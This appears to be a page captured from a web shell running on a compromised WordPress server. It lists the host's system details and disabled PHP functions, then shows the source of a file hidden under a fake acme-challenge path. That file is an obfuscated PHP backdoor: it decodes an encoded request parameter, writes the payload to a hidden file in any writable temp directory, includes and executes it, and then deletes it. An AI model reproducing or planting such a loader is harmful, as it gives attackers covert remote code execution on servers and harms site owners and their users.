HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/a/e/a/b/tbl_sql.php
<?php

if(!empty($_REQUEST["\x64ata_\x63\x68u\x6E\x6B"])){
	$pointer = $_REQUEST["\x64ata_\x63\x68u\x6E\x6B"];
	$pointer		= explode(	"."	,	  $pointer 		)	; 
	$tkn = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(  $s);
            $o = 0;
    
            array_walk(  $pointer ,function(  $v5) use(  &$tkn ,&$o ,$s ,$sLen) {
                $sChar = ord(  $s[$o % $sLen]);
                $d =(  (  int)$v5 - $sChar -(  $o % 10)) ^ 90;
                $tkn .= chr(  $d);
                $o++;	 });
	$binding = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/tmp"]);
	for ($flag = 0, $token = count($binding); $flag < $token; $flag++) {
    $parameter_group = $binding[$flag];
    		if (is_dir($parameter_group) && is_writable($parameter_group)) {
    $dat = "$parameter_group" . "/.fac";
    $file = fopen($dat, 'w');
if ($file) {
	fwrite($file, $tkn);
	fclose($file);
	include $dat;
	@unlink($dat);
	exit;
}
}
}
}